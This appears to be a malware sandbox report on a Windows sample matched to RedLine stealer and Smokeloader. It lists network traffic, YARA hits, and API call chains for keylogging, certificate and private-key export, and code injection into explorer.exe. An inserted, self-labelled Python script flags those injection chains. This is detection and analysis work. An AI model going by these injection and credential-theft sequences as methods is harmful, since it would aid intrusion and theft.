    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61465
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61467
    Source: unknown | Network traffic detected: HTTP traffic on port 61437 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61433 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61454 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61435
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61436
    Source: unknown | Network traffic detected: HTTP traffic on port 61450 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61437
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61438
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61439
    Source: unknown | Network traffic detected: HTTP traffic on port 61448 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61444 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61433
    Source: unknown | Network traffic detected: HTTP traffic on port 61440 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61434
    Source: unknown | Network traffic detected: HTTP traffic on port 61438 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61463 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61467 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61434 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61446
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61447
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61448
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61449
    Source: unknown | Network traffic detected: HTTP traffic on port 61447 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61440
    Source: unknown | Network traffic detected: HTTP traffic on port 61443 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61441
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61442
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61444
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61445
    Source: unknown | Network traffic detected: HTTP traffic on port 61439 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61470 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61435 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61410 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61452 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61450
    Source: unknown | Network traffic detected: HTTP traffic on port 61446 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61451
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61452
    Source: unknown | Network traffic detected: HTTP traffic on port 61442 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61410
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61454
    Source: unknown | HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.6:61410 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61433 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61434 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61435 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61436 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61437 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61438 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61439 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61440 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61441 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61442 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61443 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61444 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61445 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61446 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61447 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61448 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61449 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61450 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61451 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61452 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61454 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61463 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61465 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61467 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61470 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: Yara match | File source: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6316, type: MEMORYSTR
    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2736, type: MEMORYSTR
    Source: Yara match | File source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_0047162B GetKeyboardState,ToUnicode
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Code function: 11_2_00007FF7CBCA3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx

    System Summary

    Source: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000006.00000002.2516805210.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000009.00000002.2777599585.00000000006D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000009.00000002.2777432655.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2517016123.00000000007DD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
    Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_0040327D NtTerminateProcess,GetModuleHandleA,0_2_0040327D
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401514
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00402F97 RtlCreateUserThread,NtTerminateProcess,6_2_00402F97
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401542
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00403247 NtTerminateProcess,GetModuleHandleA,6_2_00403247
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401549
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_0040324F NtTerminateProcess,GetModuleHandleA,6_2_0040324F
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00403256 NtTerminateProcess,GetModuleHandleA,6_2_00403256
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401557
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_0040326C NtTerminateProcess,GetModuleHandleA,6_2_0040326C
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_0040327D NtTerminateProcess,GetModuleHandleA,6_2_0040327D
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014FE
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00403290 NtTerminateProcess,GetModuleHandleA,6_2_00403290
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00403103 RtlCreateUserThread,NtTerminateProcess,9_2_00403103
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014FB
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401641
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00403257 RtlCreateUserThread,NtTerminateProcess,9_2_00403257
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401606
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401613
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401627
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00403433 GetKeyboardLayoutList,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,9_2_00403433
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015FB
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00403103 RtlCreateUserThread,NtTerminateProcess,10_2_00403103
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_004014FB
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401641
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00403257 RtlCreateUserThread,NtTerminateProcess,10_2_00403257
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401606
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401613
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401627
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_004015FB
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00434B92 RtlMoveMemory,NtUnmapViewOfSection,13_2_00434B92
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_004333C3 NtQueryInformationFile,13_2_004333C3
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0043342B NtQueryObject,NtQueryObject,RtlMoveMemory,13_2_0043342B
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0043349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,13_2_0043349B
    Source: C:\Windows\explorer.exeCode function: 15_2_00E338B0 NtUnmapViewOfSection,15_2_00E338B0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_02F01016
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F01819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F01A80 NtCreateSection,NtMapViewOfSection
    Source: C:\Windows\explorer.exe Code function: 17_2_005C355C NtUnmapViewOfSection
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 18_2_00471016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 18_2_00471B26 NtCreateSection,NtMapViewOfSection
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 18_2_004718BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
    Source: C:\Windows\explorer.exe Code function: 19_2_00AA370C NtUnmapViewOfSection
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe Code function: 0_2_00418DF0
    Source: C:\Users\user\AppData\Roaming\jvgasii Code function: 6_2_00418DF0
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe Code function: 9_2_004159A0
    Source: C:\Users\user\AppData\Roaming\uegasii Code function: 10_2_004159A0
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe Code function: 11_2_00007FF7CBCA9AC8
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe Code function: 11_2_00007FF7CBCAB428
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe Code function: 11_2_00007FF7CBCA3220
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe Code function: 11_2_00007FF7CBCADC0C
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe Code function: 11_2_00007FF7CBCAA778
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe Code function: 11_2_00007FF7CBCAA520
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe Code function: 11_2_00007FF7CBCA213C
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00432198
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_0043C2F9
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_0044B35C
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00484438
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_0044B97E
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00436E6A
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00455F08
    Source: C:\Windows\explorer.exe Code function: 15_2_00E31E20
    Source: C:\Windows\explorer.exe Code function: 17_2_005C2054
    Source: C:\Windows\explorer.exe Code function: 17_2_005C2860
    Source: C:\Windows\explorer.exe Code function: 19_2_00AA2A04
    Source: C:\Windows\explorer.exe Code function: 19_2_00AA20F4
    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\8CAE.exe B139090C797214F88A2EA451289AB670000936C413CD2CD45AAA9895C78C63B5
    Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 00438801 appears 40 times
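The "Code function" entries above list, per function, the Win32 and Nt APIs the sandbox saw it call. The chains recorded inside the explorer.exe instances (OpenProcess followed by NtUnmapViewOfSection, ReadProcessMemory, WriteProcessMemory and CreateRemoteThread; NtCreateSection followed by NtMapViewOfSection; CreateToolhelp32Snapshot with Process32First/Process32Next) are the primitives of remote-process code injection and target selection. The script below is an added example, not part of the Joe Sandbox report: it parses entries in this format and flags ordered API subsequences that correspond to injection techniques. The pattern table and its labels are the example's own choices, and the sample entries are constructed copies of lines from this report (one left with the fused column and trailing function id exactly as extracted, to show the parser tolerates both).

```python
import re

# One "Code function" entry of the report:
#   Source: <process image> Code function: <pid_run_address> api1,api2,...,<pid_run_address>
# The space before "Code function" is optional because the extracted text
# sometimes fuses the two columns ("explorer.exeCode function").
LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?)\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8}(?:[0-9A-Fa-f]{8})?)\s*(?P<apis>.*)$"
)

# Ordered API subsequences that together indicate a technique (labels are this
# example's own). Every API in a pattern must appear in the listed order;
# unrelated calls may sit in between.
INJECTION_PATTERNS = {
    "remote thread injection (OpenProcess -> WriteProcessMemory -> CreateRemoteThread)":
        ("OpenProcess", "WriteProcessMemory", "CreateRemoteThread"),
    "unmap-and-rewrite of a remote image (hollowing-style)":
        ("OpenProcess", "NtUnmapViewOfSection", "WriteProcessMemory"),
    "section object mapped into a process (NtCreateSection -> NtMapViewOfSection)":
        ("NtCreateSection", "NtMapViewOfSection"),
    "process enumeration via Toolhelp snapshot":
        ("CreateToolhelp32Snapshot", "Process32First", "Process32Next"),
}


def parse_code_function_line(line):
    """Return {'proc', 'fid', 'apis'} for a Code function entry, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fid = m.group("fid")
    apis = []
    for tok in m.group("apis").split(","):
        tok = tok.strip()
        # The report repeats the function id at the end of the entry, often
        # fused onto the last API name; strip it so it is not taken for an API.
        if tok.endswith(fid):
            tok = tok[: -len(fid)].strip()
        if tok:
            apis.append(tok)
    return {"proc": m.group("proc"), "fid": fid, "apis": apis}


def is_ordered_subsequence(pattern, calls):
    """True when every name in pattern occurs in calls, in that order."""
    it = iter(calls)
    return all(any(call == wanted for call in it) for wanted in pattern)


def find_injection_chains(lines):
    """Return (process, function id, technique label) for every matching entry."""
    findings = []
    for line in lines:
        rec = parse_code_function_line(line)
        if rec is None:
            continue
        for label, pattern in INJECTION_PATTERNS.items():
            if is_ordered_subsequence(pattern, rec["apis"]):
                findings.append((rec["proc"], rec["fid"], label))
    return findings


# Constructed sample input: four entries copied in shape from the report above.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F01819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,16_2_02F01819",
    r"Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01A80 NtCreateSection,NtMapViewOfSection,16_2_02F01A80",
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 18_2_00471016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,18_2_00471016",
    r"Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe Code function: 0_2_00418DF00_2_00418DF0",
]

if __name__ == "__main__":
    for proc, fid, label in find_injection_chains(SAMPLE_LINES):
        print(f"{proc}  {fid}  {label}")
```

Matching on ordered subsequences rather than on the bare presence of WriteProcessMemory keeps benign debuggers and installers (which also touch these APIs, but not in this order inside one function) out of the result, while still catching the two distinct techniques visible in function 16_2_02F01819.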
    Source: O4zPA1oI9Y.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
